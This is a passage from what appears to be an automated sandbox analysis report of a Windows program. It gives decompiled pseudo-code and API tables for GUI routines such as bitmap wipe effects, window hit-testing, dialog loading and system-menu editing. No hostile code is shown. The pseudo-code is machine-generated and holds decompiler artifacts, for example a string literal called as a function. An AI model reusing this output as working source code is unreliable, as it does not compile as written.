                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: String$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 352835431-0
                                            • Opcode ID: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
                                            • Instruction ID: 2f12d8ec06d9f8176a5bc05fe246616eea55ae1664675450d96905dac16d2820
                                            • Opcode Fuzzy Hash: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
                                            • Instruction Fuzzy Hash: EA515D3190020ABBCF218F54CC49EEF7BB5FB45794F10412AF915A22E1D3399D61DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00404577(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t135;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a28 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, _a28 - (_v12 + 1) * _a40, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20 + _a28 - (_v12 + 1) * _a40, _a24, (_v12 + 1) * _a40, _a32, _v8, _a28 - (_v12 + 1) * _a40, 0, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t135 = _t135 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 00404581
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404596
                                            • SelectObject.GDI32(?,?), ref: 004045A7
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004045CE
                                            • StretchBlt.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00404637
                                            • BitBlt.GDI32(00000000,?,?,?,?,?,?,00000000,00CC0020), ref: 00404682
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004046BE
                                            • DeleteObject.GDI32(?), ref: 004046C8
                                            • DeleteDC.GDI32(?), ref: 004046D2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
                                            • Instruction ID: a75907197356ce4ca66e83fb1b854f5ba4b4597ff605ca05275262f1e745a3b8
                                            • Opcode Fuzzy Hash: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
                                            • Instruction Fuzzy Hash: 7F51A5B6600109AFCB04CF98DD95EEE77B9FF8C348F118258FA09A7254D634E9118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00404816(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t135;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a32 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, 0, _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20, _a24 + _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _v8, 0, _a32 - (_v12 + 1) * _a40, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t135 = _t135 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 00404820
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404835
                                            • SelectObject.GDI32(?,?), ref: 00404846
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040486D
                                            • StretchBlt.GDI32(?,00000000,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004048D6
                                            • BitBlt.GDI32(?,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00404921
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 0040495D
                                            • DeleteObject.GDI32(?), ref: 00404967
                                            • DeleteDC.GDI32(?), ref: 00404971
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
                                            • Instruction ID: 1794ec46a4d52dcc5cb24ae7db09ad2764e7e5e2d0b87eeeb5bcffab36add2c1
                                            • Opcode Fuzzy Hash: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
                                            • Instruction Fuzzy Hash: 375198B6600109AFCB04CF98D995EEE77B9FF8C344F158258FA09A7254C635ED11CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E0041E758(intOrPtr* __ecx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				struct tagPOINT _v20;
                                            				void* __ebp;
                                            				signed int _t49;
                                            				struct HWND__* _t60;
                                            				intOrPtr _t63;
                                            				intOrPtr _t66;
                                            				void* _t68;
                                            				void* _t72;
                                            				intOrPtr _t81;
                                            				void* _t82;
                                            				intOrPtr _t83;
                                            				struct HWND__* _t85;
                                            				intOrPtr _t86;
                                            				intOrPtr* _t87;
                                            				void* _t88;
                                            
                                            				_t87 = __ecx;
                                            				_t42 = GetKeyState(1);
                                            				if(_t42 < 0) {
                                            					L31:
                                            					return _t42;
                                            				}
                                            				_t83 = E004249C4();
                                            				_v12 = _t83;
                                            				GetCursorPos( &_v20);
                                            				ScreenToClient( *(_t87 + 0x1c),  &_v20);
                                            				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
                                            				_v8 = _t49;
                                            				if(_t49 < 0) {
                                            					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
                                            					L16:
                                            					if(_v8 < 0) {
                                            						L25:
                                            						if( *(_v12 + 0x104) == 0xffffffff) {
                                            							KillTimer( *(_t87 + 0x1c), 0xe001);
                                            						}
                                            						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
                                            						L28:
                                            						_t42 = 0xe000;
                                            						if(_a4 != 0xe000) {
                                            							goto L31;
                                            						}
                                            						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
                                            						if(_v8 < 0) {
                                            							goto L31;
                                            						}
                                            						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
                                            					}
                                            					ClientToScreen( *(_t87 + 0x1c),  &_v20);
                                            					_push(_v20.y);
                                            					_t85 = WindowFromPoint(_v20);
                                            					if(_t85 == 0) {
                                            						L23:
                                            						_t59 = _v12;
                                            						_v8 = _v8 | 0xffffffff;
                                            						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
                                            						L24:
                                            						if(_v8 >= 0) {
                                            							goto L28;
                                            						}
                                            						goto L25;
                                            					}
                                            					_t60 =  *(_t87 + 0x1c);
                                            					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
                                            						goto L24;
                                            					} else {
                                            						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
                                            						if(_t63 != 0) {
                                            							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                                            						}
                                            						if(_t63 == _t85) {
                                            							goto L24;
                                            						} else {
                                            							goto L23;
                                            						}
                                            					}
                                            				}
                                            				_t72 = E00414CEF(_t87);
                                            				if(E00414D5B(_t87) == 0 || E004166B3(_t72) == 0) {
                                            					_v8 = _v8 | 0xffffffff;
                                            				}
                                            				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
                                            				if(_t66 != 0) {
                                            					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
                                            				} else {
                                            					_t86 = 0;
                                            				}
                                            				_t68 = E00413740(_t88, GetCapture());
                                            				if(_t68 != _t87) {
                                            					if(_t68 != 0) {
                                            						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
                                            					} else {
                                            						_t81 = 0;
                                            					}
                                            					if(_t81 != _t86 && E00414CEF(_t68) == _t72) {
                                            						_v8 = _v8 | 0xffffffff;
                                            					}
                                            				}
                                            				goto L16;
                                            			}





















                                            APIs
                                            • GetKeyState.USER32(00000001), ref: 0041E764
                                            • GetCursorPos.USER32(?), ref: 0041E782
                                            • ScreenToClient.USER32 ref: 0041E78F
                                            • GetCapture.USER32 ref: 0041E7DF
                                              • Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD
                                            • ClientToScreen.USER32(?,?), ref: 0041E829
                                            • WindowFromPoint.USER32(?,?), ref: 0041E835
                                            • IsChild.USER32(?,00000000), ref: 0041E84A
                                            • KillTimer.USER32(?,0000E001), ref: 0041E890
                                            • KillTimer.USER32(?,0000E000), ref: 0041E8AD
                                              • Part of subcall function 00414D5B: GetForegroundWindow.USER32(00000000,?,0041E7BB), ref: 00414D5F
                                              • Part of subcall function 00414D5B: GetLastActivePopup.USER32(?), ref: 00414D77
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                            • String ID:
                                            • API String ID: 1383385731-0
                                            • Opcode ID: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
                                            • Instruction ID: 60a7b001f52f4571865f2cd2d5ebedbd3e454d14a8c641626661d3e0f237eb6f
                                            • Opcode Fuzzy Hash: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
                                            • Instruction Fuzzy Hash: 4D416334B00605DFDB20AF66CC44AEE7BB5EF44714F20866AE861D72E1D738DD819B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0040443F(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t111;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a28 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, 0, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20, _a24, (_v12 + 1) * _a40, _a32, _v8, 0, 0, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t111 = _t111 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 00404449
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040445E
                                            • SelectObject.GDI32(?,?), ref: 0040446F
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404496
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 004044ED
                                            • BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 0040451B
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 00404557
                                            • DeleteObject.GDI32(?), ref: 00404561
                                            • DeleteDC.GDI32(?), ref: 0040456B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
                                            • Instruction ID: 5871b13c33776004db1b10881a90cc129f1f9f80c304186c253610c93300aed5
                                            • Opcode Fuzzy Hash: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
                                            • Instruction Fuzzy Hash: D84164B6600108AFCB14CF98DD95FEE77B9EB8C744F118258FA09A7294D634ED11CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E004046DE(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t111;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a32 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, 0, 0, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20, _a24, _a28, (_v12 + 1) * _a40, _v8, 0, 0, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t111 = _t111 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 004046E8
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004046FD
                                            • SelectObject.GDI32(?,?), ref: 0040470E
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404735
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0040478C
                                            • BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 004047BA
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004047F6
                                            • DeleteObject.GDI32(?), ref: 00404800
                                            • DeleteDC.GDI32(?), ref: 0040480A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
                                            • Instruction ID: 516329d77e908a997c244217de3d4d8bb9b87b0cd9461334f0d2af6cacd336f2
                                            • Opcode Fuzzy Hash: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
                                            • Instruction Fuzzy Hash: 6F4174B6600108EBCB04CF98DD95FAE77B9EB8C744F158258FA09A7250D634E9118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00412121(intOrPtr* __ecx) {
                                            				void* __esi;
                                            				signed int _t40;
                                            				struct HWND__* _t44;
                                            				signed int _t48;
                                            				signed char _t53;
                                            				struct HWND__* _t55;
                                            				struct HINSTANCE__* _t60;
                                            				void* _t62;
                                            				void* _t73;
                                            				intOrPtr* _t77;
                                            				void* _t79;
                                            				void* _t81;
                                            
                                            				E00406520(E00429CE8, _t79);
                                            				_t77 = __ecx;
                                            				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x18;
                                            				 *((intOrPtr*)(_t79 - 0x1c)) = __ecx;
                                            				_t73 =  *(__ecx + 0x44);
                                            				 *(_t79 - 0x18) =  *(__ecx + 0x48);
                                            				_t40 = E00424BFB();
                                            				_t60 =  *(_t40 + 0xc);
                                            				if( *(_t77 + 0x40) != 0) {
                                            					_t60 =  *(E00424BFB() + 0xc);
                                            					_t40 = LoadResource(_t60, FindResourceA(_t60,  *(_t77 + 0x40), 5));
                                            					_t73 = _t40;
                                            				}
                                            				if(_t73 != 0) {
                                            					_t40 = LockResource(_t73);
                                            					 *(_t79 - 0x18) = _t40;
                                            				}
                                            				if( *(_t79 - 0x18) != 0) {
                                            					 *(_t79 - 0x14) = E004120A5(_t77);
                                            					E00413C3E();
                                            					__eflags =  *(_t79 - 0x14);
                                            					 *(_t79 - 0x20) = 0;
                                            					if( *(_t79 - 0x14) != 0) {
                                            						_t55 = IsWindowEnabled( *(_t79 - 0x14));
                                            						__eflags = _t55;
                                            						if(_t55 != 0) {
                                            							EnableWindow( *(_t79 - 0x14), 0);
                                            							 *(_t79 - 0x20) = 1;
                                            						}
                                            					}
                                            					_push(_t77);
                                            					 *(_t79 - 4) = 0;
                                            					"VWh\rDB"();
                                            					_t44 = E00411E32(_t77,  *(_t79 - 0x18), E00413740(_t79,  *(_t79 - 0x14)), _t60);
                                            					__eflags = _t44;
                                            					if(_t44 != 0) {
                                            						__eflags =  *(_t77 + 0x24) & 0x00000010;
                                            						if(( *(_t77 + 0x24) & 0x00000010) != 0) {
                                            							_t62 = 4;
                                            							_t53 = E00416528(_t77);
                                            							__eflags = _t53 & 0x00000001;
                                            							if((_t53 & 0x00000001) != 0) {
                                            								_t62 = 5;
                                            							}
                                            							_push(_t62);
                                            							E00415F1B(_t77);
                                            						}
                                            						__eflags =  *(_t77 + 0x1c);
                                            						if( *(_t77 + 0x1c) != 0) {
                                            							E0041663D(_t77, 0, 0, 0, 0, 0, 0x97);
                                            						}
                                            					}
                                            					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                            					__eflags =  *(_t79 - 0x20);
                                            					if( *(_t79 - 0x20) != 0) {
                                            						EnableWindow( *(_t79 - 0x14), 1);
                                            					}
                                            					__eflags =  *(_t79 - 0x14);
                                            					if(__eflags != 0) {
                                            						__eflags = GetActiveWindow() -  *(_t77 + 0x1c);
                                            						if(__eflags == 0) {
                                            							SetActiveWindow( *(_t79 - 0x14));
                                            						}
                                            					}
                                            					 *((intOrPtr*)( *_t77 + 0x58))();
                                            					E004120DF(_t77, _t77, __eflags);
                                            					_t48 =  *(_t77 + 0x2c);
                                            				} else {
                                            					_t48 = _t40 | 0xffffffff;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
                                            				return _t48;
                                            			}
















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00412126
                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041215E
                                            • LoadResource.KERNEL32(?,00000000), ref: 00412166
                                              • Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63
                                            • LockResource.KERNEL32(?), ref: 00412173
                                            • IsWindowEnabled.USER32(?), ref: 004121A6
                                            • EnableWindow.USER32(?,00000000), ref: 004121B4
                                            • EnableWindow.USER32(?,00000001), ref: 00412242
                                            • GetActiveWindow.USER32 ref: 0041224D
                                            • SetActiveWindow.USER32(?), ref: 0041225B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                                            • String ID:
                                            • API String ID: 401145483-0
                                            • Opcode ID: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
                                            • Instruction ID: 29e84b16fa1c15ce6d6e5a6389cc251cef0e56d6ff14e1849cc81362d4330516
                                            • Opcode Fuzzy Hash: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
                                            • Instruction Fuzzy Hash: 0841C331A00604AFCB21AF65CA45AEFBBB5FF44715F10011FF502E2291CBB99D91CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0041DF9A(signed int __ecx) {
                                            				void* _t33;
                                            				void* _t34;
                                            				CHAR* _t41;
                                            				signed int _t42;
                                            				signed int _t43;
                                            				struct HWND__* _t44;
                                            				signed int _t51;
                                            				void* _t53;
                                            				signed int _t62;
                                            				signed int _t73;
                                            				signed int _t75;
                                            				void* _t77;
                                            
                                            				E00406520(E0042A610, _t77);
                                            				_push(__ecx);
                                            				_t51 =  *(_t77 + 0xc);
                                            				_t62 = __ecx;
                                            				_t33 = 0x80c83b00;
                                            				 *(_t77 - 0x10) = __ecx;
                                            				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
                                            				if((_t51 & 0x00000004) != 0) {
                                            					_t33 = 0x80c83300;
                                            				}
                                            				_t34 = E00422BCF(_t62, 0, 0, 0x4399a0, _t33, 0x439630,  *((intOrPtr*)(_t77 + 8)), 0);
                                            				if(_t34 != 0) {
                                            					asm("sbb esi, esi");
                                            					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
                                            					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
                                            					_t53 = E00417635();
                                            					DeleteMenu( *(_t53 + 4), 0xf000, 0);
                                            					DeleteMenu( *(_t53 + 4), 0xf020, 0);
                                            					DeleteMenu( *(_t53 + 4), 0xf030, 0);
                                            					DeleteMenu( *(_t53 + 4), 0xf120, 0);
                                            					_t41 =  *0x436980; // 0x436994
                                            					 *(_t77 + 0xc) = _t41;
                                            					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                            					_t42 = E00417214(_t77 + 0xc, __eflags, 0xf011);
                                            					__eflags = _t42;
                                            					if(_t42 != 0) {
                                            						DeleteMenu( *(_t53 + 4), 0xf060, 0);
                                            						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
                                            					}
                                            					_t75 =  *(_t77 - 0x10);
                                            					_t43 = E0041D0E3(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
                                            					__eflags = _t43;
                                            					if(_t43 != 0) {
                                            						__eflags = _t75;
                                            						if(_t75 != 0) {
                                            							_t44 =  *(_t75 + 0x1c);
                                            						} else {
                                            							_t44 = 0;
                                            						}
                                            						E00413740(_t77, SetParent( *(_t75 + 0xe8), _t44));
                                            						_push(1);
                                            						_pop(0);
                                            					}
                                            					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
                                            					_t27 = _t77 - 4;
                                            					 *_t27 =  *(_t77 - 4) | 0xffffffff;
                                            					__eflags =  *_t27;
                                            					E00416AEC(_t77 + 0xc);
                                            					_t34 = 0;
                                            				} else {
                                            					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
                                            				return _t34;
                                            			}
















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041DF9F
                                            • GetSystemMenu.USER32(?,00000000), ref: 0041E013
                                            • DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0041E031
                                            • DeleteMenu.USER32(?,0000F020,00000000), ref: 0041E03D
                                            • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041E049
                                            • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041E055
                                            • DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0041E07E
                                            • AppendMenuA.USER32 ref: 0041E08D
                                            • SetParent.USER32(?,?,?,?,0000E81F,0000F011), ref: 0041E0CA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Menu$Delete$AppendH_prologParentSystem
                                            • String ID:
                                            • API String ID: 3391233131-0
                                            • Opcode ID: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
